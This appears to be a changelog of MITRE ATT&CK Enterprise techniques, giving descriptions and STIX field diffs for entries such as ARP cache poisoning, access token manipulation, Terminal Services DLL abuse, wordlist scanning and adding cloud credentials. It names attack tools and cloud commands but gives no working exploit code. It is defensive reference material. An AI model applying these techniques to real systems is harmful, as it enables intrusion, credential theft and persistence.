| Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018) Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021) |
| Description |
|---|
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll.(Citation: Microsoft System Services Fundamentals) The termsrv.dll file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created. |
| Description |
|---|
| Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.(Citation: ClearSky Lebanese Cedar Jan 2021) This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [Brute Force](https://attack.mitre.org/techniques/T1110)). As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure.(Citation: S3Recon GitHub)(Citation: GCPBucketBrute) Once storage objects are discovered, adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530) to access valuable information that can be exfiltrated or used to escalate privileges and move laterally. |
| Description |
|---|
Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API or the high level NSXPCConnection API in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068). |
| Description |
|---|
| Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache. An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment. The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver) Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-28 01:04:39.141000+00:00 | 2022-07-22 18:37:22.176000+00:00 |
| external_references[1]['source_name'] | RFC826 ARP | Cylance Cleaver |
| external_references[1]['description'] | Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020. | Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. |
| external_references[1]['url'] | https://tools.ietf.org/html/rfc826 | https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf |
| external_references[2]['source_name'] | Sans ARP Spoofing Aug 2003 | RFC826 ARP |
| external_references[2]['description'] | Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020. | Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020. |
| external_references[2]['url'] | https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411 | https://tools.ietf.org/html/rfc826 |
| external_references[3]['source_name'] | Cylance Cleaver | Sans ARP Spoofing Aug 2003 |
| external_references[3]['description'] | Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. | Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020. |
| external_references[3]['url'] | https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf | https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411 |
| x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| Description |
|---|
| Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-22 21:36:52.825000+00:00 | 2022-03-21 19:01:25.043000+00:00 |
| x_mitre_data_sources[0] | Process: Process Metadata | Command: Command Execution |
| x_mitre_data_sources[1] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Metadata |
| x_mitre_data_sources[4] | File: File Metadata | Process: Process Creation |
| x_mitre_data_sources[5] | File: File Modification | Process: OS API Execution |
| x_mitre_data_sources[6] | Process: OS API Execution | File: File Metadata |
| Description |
|---|
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017. | |
| external_references | CAPEC-633 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-633 | |
| external_references | Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:51:49.334000+00:00 | 2022-05-03 02:14:43.557000+00:00 |
| external_references[1]['source_name'] | capec | BlackHat Atkinson Winchester Token Manipulation |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/633.html | https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf |
| external_references[2]['source_name'] | Pentestlab Token Manipulation | Microsoft Command-line Logging |
| external_references[2]['description'] | netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017. | Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017. |
| external_references[2]['url'] | https://pentestlab.blog/2017/04/03/token-manipulation/ | https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing |
| external_references[3]['source_name'] | Microsoft Command-line Logging | Microsoft LogonUser |
| external_references[3]['description'] | Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017. | Microsoft TechNet. (n.d.). Retrieved April 25, 2017. |
| external_references[3]['url'] | https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx |
| external_references[4]['source_name'] | Microsoft LogonUser | Microsoft DuplicateTokenEx |
| external_references[4]['url'] | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx | https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx |
| external_references[5]['source_name'] | Microsoft DuplicateTokenEx | Microsoft ImpersonateLoggedOnUser |
| external_references[5]['url'] | https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx |
| external_references[6]['source_name'] | Microsoft ImpersonateLoggedOnUser | Pentestlab Token Manipulation |
| external_references[6]['description'] | Microsoft TechNet. (n.d.). Retrieved April 25, 2017. | netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017. |
| external_references[6]['url'] | https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx | https://pentestlab.blog/2017/04/03/token-manipulation/ |
| external_references[7]['source_name'] | BlackHat Atkinson Winchester Token Manipulation | capec |
| external_references[7]['url'] | https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf | https://capec.mitre.org/data/definitions/633.html |
| x_mitre_defense_bypassed[1] | System access controls | Heuristic Detection |
| x_mitre_defense_bypassed[2] | File system access controls | System Access Controls |
| x_mitre_defense_bypassed[3] | Heuristic Detection | Host Forensic Analysis |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_defense_bypassed | Host forensic analysis |
| Old Description | New Description |
|---|---|
| Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.
Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:15:29.911000+00:00 | 2022-04-19 22:57:27.449000+00:00 |
| description | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019) | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, Set-LocalUser and Set-ADAccountPassword [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the passwd utility may be used to change passwords. Accounts could also be disabled by Group Policy.
Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. |
| external_references[2]['description'] | Harbison, M.. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. | Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | User Account: User Account Deletion | |
| x_mitre_platforms | Office 365 | |
| x_mitre_platforms | SaaS |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | User Account: User Account Deletion |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. | Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078). |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 18:57:04.505000+00:00 | 2022-10-18 15:50:24.811000+00:00 |
| description | Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. | Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078). |
| external_references[1]['source_name'] | Microsoft User Modified Event | Microsoft Security Event 4670 |
| external_references[1]['description'] | Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017. | Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 | https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 |
| external_references[2]['source_name'] | Microsoft Security Event 4670 | Microsoft User Modified Event |
| external_references[2]['description'] | Franklin Smith, R. (n.d.). Windows Security Log Event ID 4670. Retrieved November 4, 2019. | Lich, B., Miroshnikov, A. (2017, April 5). 4738(S): A user account was changed. Retrieved June 30, 2017. |
| external_references[2]['url'] | https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670 | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738 |
| x_mitre_data_sources[0] | File: File Modification | User Account: User Account Modification |
| x_mitre_data_sources[1] | Command: Command Execution | Group: Group Modification |
| x_mitre_data_sources[3] | Group: Group Modification | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[4] | User Account: User Account Modification | Command: Command Execution |
| x_mitre_data_sources[5] | Active Directory: Active Directory Object Modification | File: File Modification |
| x_mitre_detection | Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. | Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017) Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078) |
| x_mitre_version | 2.2 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Wojciech Lesicki | |
| x_mitre_platforms | SaaS |
| Description |
|---|
| Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:20:09.600000+00:00 | 2022-03-08 20:58:13.661000+00:00 |
| Old Description | New Description |
|---|---|
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) |
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.582000+00:00 | 2022-10-24 15:20:47.020000+00:00 |
| description | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) |
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation) |
| external_references[1]['source_name'] | Microsoft SolarWinds Customer Guidance | Expel IO Evil in AWS |
| external_references[1]['description'] | MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020. | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. |
| external_references[1]['url'] | https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ | https://expel.io/blog/finding-evil-in-aws/ |
| external_references[2]['source_name'] | Blue Cloud of Death | Demystifying Azure AD Service Principals |
| external_references[2]['description'] | Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019. | Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020. |
| external_references[2]['url'] | https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 | https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ |
| external_references[3]['source_name'] | Blue Cloud of Death Video | GCP SSH Key Add |
| external_references[3]['description'] | Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019. | Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020. |
| external_references[3]['url'] | https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 | https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add |
| external_references[4]['source_name'] | Demystifying Azure AD Service Principals | Blue Cloud of Death Video |
| external_references[4]['description'] | Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020. | Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019. |
| external_references[4]['url'] | https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ | https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 |
| external_references[5]['source_name'] | GCP SSH Key Add | Blue Cloud of Death |
| external_references[5]['description'] | Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020. | Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019. |
